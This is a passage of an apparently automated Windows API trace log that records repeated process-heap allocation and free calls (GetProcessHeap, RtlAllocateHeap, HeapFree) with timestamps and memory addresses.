HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.043] GetProcessHeap () returned 0x4f10000 [0061.043] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.043] GetProcessHeap () returned 0x4f10000 [0061.043] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.043] GetProcessHeap () returned 0x4f10000 [0061.043] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.043] GetProcessHeap () returned 0x4f10000 [0061.043] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.043] GetProcessHeap () returned 0x4f10000 [0061.043] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.043] GetProcessHeap () returned 0x4f10000 [0061.043] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.044] GetProcessHeap () returned 0x4f10000 [0061.044] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.044] GetProcessHeap () returned 0x4f10000 [0061.044] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.044] GetProcessHeap () returned 0x4f10000 [0061.044] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.044] GetProcessHeap () returned 0x4f10000 [0061.044] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.044] GetProcessHeap () returned 0x4f10000 [0061.044] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.044] GetProcessHeap () returned 0x4f10000 [0061.044] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.044] GetProcessHeap () returned 0x4f10000 [0061.044] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.044] GetProcessHeap () returned 0x4f10000 [0061.044] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.044] GetProcessHeap () returned 0x4f10000 [0061.044] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.044] GetProcessHeap () returned 0x4f10000 [0061.044] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.044] GetProcessHeap () returned 0x4f10000 [0061.044] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.044] GetProcessHeap () returned 0x4f10000 [0061.044] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.044] GetProcessHeap () returned 0x4f10000 [0061.044] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.044] GetProcessHeap () returned 0x4f10000 [0061.044] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.044] GetProcessHeap () returned 0x4f10000 [0061.044] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.044] GetProcessHeap () returned 0x4f10000 [0061.044] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.044] GetProcessHeap () returned 0x4f10000 [0061.044] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.044] GetProcessHeap () returned 0x4f10000 [0061.044] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.045] GetProcessHeap () returned 0x4f10000 [0061.045] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.045] GetProcessHeap () returned 0x4f10000 [0061.045] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.045] GetProcessHeap () returned 0x4f10000 [0061.045] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.045] GetProcessHeap () returned 0x4f10000 [0061.045] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.045] GetProcessHeap () returned 0x4f10000 [0061.045] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.045] GetProcessHeap () returned 0x4f10000 [0061.045] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.045] GetProcessHeap () returned 0x4f10000 [0061.045] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.045] GetProcessHeap () returned 0x4f10000 [0061.045] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.045] GetProcessHeap () returned 0x4f10000 [0061.045] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.045] GetProcessHeap () returned 0x4f10000 [0061.045] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.045] GetProcessHeap () returned 0x4f10000 [0061.045] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.045] GetProcessHeap () returned 0x4f10000 [0061.045] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.045] GetProcessHeap () returned 0x4f10000 [0061.045] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.045] GetProcessHeap () returned 0x4f10000 [0061.045] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.045] GetProcessHeap () returned 0x4f10000 [0061.045] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.045] GetProcessHeap () returned 0x4f10000 [0061.045] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.045] GetProcessHeap () returned 0x4f10000 [0061.045] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.045] GetProcessHeap () returned 0x4f10000 [0061.046] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.046] GetProcessHeap () returned 0x4f10000 [0061.046] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.046] GetProcessHeap () returned 0x4f10000 [0061.046] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.046] GetProcessHeap () returned 0x4f10000 [0061.046] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.046] GetProcessHeap () returned 0x4f10000 [0061.046] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.046] GetProcessHeap () returned 0x4f10000 [0061.046] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.046] GetProcessHeap () returned 0x4f10000 [0061.046] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.046] GetProcessHeap () returned 0x4f10000 [0061.046] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.046] GetProcessHeap () returned 0x4f10000 [0061.046] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.046] GetProcessHeap () returned 0x4f10000 [0061.046] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.046] GetProcessHeap () returned 0x4f10000 [0061.046] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.046] GetProcessHeap () returned 0x4f10000 [0061.046] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.046] GetProcessHeap () returned 0x4f10000 [0061.046] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.046] GetProcessHeap () returned 0x4f10000 [0061.046] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.046] GetProcessHeap () returned 0x4f10000 [0061.046] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.046] GetProcessHeap () returned 0x4f10000 [0061.046] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.046] GetProcessHeap () returned 0x4f10000 [0061.046] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.046] GetProcessHeap () returned 0x4f10000 [0061.046] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.046] GetProcessHeap () returned 0x4f10000 [0061.047] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.047] GetProcessHeap () returned 0x4f10000 [0061.047] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.047] GetProcessHeap () returned 0x4f10000 [0061.047] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.047] GetProcessHeap () returned 0x4f10000 [0061.047] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.047] GetProcessHeap () returned 0x4f10000 [0061.047] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.047] GetProcessHeap () returned 0x4f10000 [0061.047] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.047] GetProcessHeap () returned 0x4f10000 [0061.047] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.047] GetProcessHeap () returned 0x4f10000 [0061.047] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.047] GetProcessHeap () returned 0x4f10000 [0061.047] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.047] GetProcessHeap () returned 0x4f10000 [0061.047] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.047] GetProcessHeap () returned 0x4f10000 [0061.047] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.047] GetProcessHeap () returned 0x4f10000 [0061.047] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.047] GetProcessHeap () returned 0x4f10000 [0061.047] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.047] GetProcessHeap () returned 0x4f10000 [0061.047] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.047] GetProcessHeap () returned 0x4f10000 [0061.047] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.047] GetProcessHeap () returned 0x4f10000 [0061.047] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.047] GetProcessHeap () returned 0x4f10000 [0061.047] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.047] GetProcessHeap () returned 0x4f10000 [0061.047] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.047] GetProcessHeap () returned 0x4f10000 [0061.047] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.048] GetProcessHeap () returned 0x4f10000 [0061.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.048] GetProcessHeap () returned 0x4f10000 [0061.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.048] GetProcessHeap () returned 0x4f10000 [0061.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.048] GetProcessHeap () returned 0x4f10000 [0061.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.048] GetProcessHeap () returned 0x4f10000 [0061.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.048] GetProcessHeap () returned 0x4f10000 [0061.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.048] GetProcessHeap () returned 0x4f10000 [0061.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.048] GetProcessHeap () returned 0x4f10000 [0061.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.048] GetProcessHeap () returned 0x4f10000 [0061.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.048] GetProcessHeap () returned 0x4f10000 [0061.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.048] GetProcessHeap () returned 0x4f10000 [0061.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.048] GetProcessHeap () returned 0x4f10000 [0061.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.048] GetProcessHeap () returned 0x4f10000 [0061.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.048] GetProcessHeap () returned 0x4f10000 [0061.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.048] GetProcessHeap () returned 0x4f10000 [0061.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.048] GetProcessHeap () returned 0x4f10000 [0061.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.048] GetProcessHeap () returned 0x4f10000 [0061.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.048] GetProcessHeap () returned 0x4f10000 [0061.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.048] GetProcessHeap () returned 0x4f10000 [0061.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.049] GetProcessHeap () returned 0x4f10000 [0061.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.049] GetProcessHeap () returned 0x4f10000 [0061.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.049] GetProcessHeap () returned 0x4f10000 [0061.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.049] GetProcessHeap () returned 0x4f10000 [0061.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.049] GetProcessHeap () returned 0x4f10000 [0061.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.049] GetProcessHeap () returned 0x4f10000 [0061.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.049] GetProcessHeap () returned 0x4f10000 [0061.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.049] GetProcessHeap () returned 0x4f10000 [0061.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.049] GetProcessHeap () returned 0x4f10000 [0061.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.049] GetProcessHeap () returned 0x4f10000 [0061.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.049] GetProcessHeap () returned 0x4f10000 [0061.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.049] GetProcessHeap () returned 0x4f10000 [0061.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.049] GetProcessHeap () returned 0x4f10000 [0061.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.049] GetProcessHeap () returned 0x4f10000 [0061.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.049] GetProcessHeap () returned 0x4f10000 [0061.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.049] GetProcessHeap () returned 0x4f10000 [0061.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.049] GetProcessHeap () returned 0x4f10000 [0061.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.049] GetProcessHeap () returned 0x4f10000 [0061.050] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.050] GetProcessHeap () returned 0x4f10000 [0061.050] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.050] GetProcessHeap () returned 0x4f10000 [0061.050] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.050] GetProcessHeap () returned 0x4f10000 [0061.050] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.050] GetProcessHeap () returned 0x4f10000 [0061.050] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.050] GetProcessHeap () returned 0x4f10000 [0061.050] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.050] GetProcessHeap () returned 0x4f10000 [0061.050] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.050] GetProcessHeap () returned 0x4f10000 [0061.050] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.050] GetProcessHeap () returned 0x4f10000 [0061.050] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.050] GetProcessHeap () returned 0x4f10000 [0061.050] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.050] GetProcessHeap () returned 0x4f10000 [0061.050] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.050] GetProcessHeap () returned 0x4f10000 [0061.050] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.050] GetProcessHeap () returned 0x4f10000 [0061.050] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.051] GetProcessHeap () returned 0x4f10000 [0061.051] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.051] GetProcessHeap () returned 0x4f10000 [0061.051] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.051] GetProcessHeap () returned 0x4f10000 [0061.051] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.051] GetProcessHeap () returned 0x4f10000 [0061.051] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.051] GetProcessHeap () returned 0x4f10000 [0061.051] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.051] GetProcessHeap () returned 0x4f10000 [0061.051] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.051] GetProcessHeap () returned 0x4f10000 [0061.051] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.051] GetProcessHeap () returned 0x4f10000 [0061.051] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.051] GetProcessHeap () returned 0x4f10000 [0061.051] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.051] GetProcessHeap () returned 0x4f10000 [0061.051] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.051] GetProcessHeap () returned 0x4f10000 [0061.051] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.051] GetProcessHeap () returned 0x4f10000 [0061.051] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.051] GetProcessHeap () returned 0x4f10000 [0061.051] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.051] GetProcessHeap () returned 0x4f10000 [0061.051] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.051] GetProcessHeap () returned 0x4f10000 [0061.051] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.051] GetProcessHeap () returned 0x4f10000 [0061.051] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.051] GetProcessHeap () returned 0x4f10000 [0061.051] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.051] GetProcessHeap () returned 0x4f10000 [0061.051] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.052] GetProcessHeap () returned 0x4f10000 [0061.052] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.052] GetProcessHeap () returned 0x4f10000 [0061.052] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.052] GetProcessHeap () returned 0x4f10000 [0061.052] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.052] GetProcessHeap () returned 0x4f10000 [0061.052] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.052] GetProcessHeap () returned 0x4f10000 [0061.052] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.052] GetProcessHeap () returned 0x4f10000 [0061.052] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.052] GetProcessHeap () returned 0x4f10000 [0061.052] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.052] GetProcessHeap () returned 0x4f10000 [0061.052] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.052] GetProcessHeap () returned 0x4f10000 [0061.052] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.052] GetProcessHeap () returned 0x4f10000 [0061.052] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.052] GetProcessHeap () returned 0x4f10000 [0061.052] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.052] GetProcessHeap () returned 0x4f10000 [0061.052] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.052] GetProcessHeap () returned 0x4f10000 [0061.052] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.052] GetProcessHeap () returned 0x4f10000 [0061.052] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.052] GetProcessHeap () returned 0x4f10000 [0061.052] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.052] GetProcessHeap () returned 0x4f10000 [0061.052] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.052] GetProcessHeap () returned 0x4f10000 [0061.052] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.052] GetProcessHeap () returned 0x4f10000 [0061.052] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.052] GetProcessHeap () returned 0x4f10000 [0061.053] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.053] GetProcessHeap () returned 0x4f10000 [0061.053] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.053] GetProcessHeap () returned 0x4f10000 [0061.053] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.053] GetProcessHeap () returned 0x4f10000 [0061.053] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.053] GetProcessHeap () returned 0x4f10000 [0061.053] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.053] GetProcessHeap () returned 0x4f10000 [0061.053] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.053] GetProcessHeap () 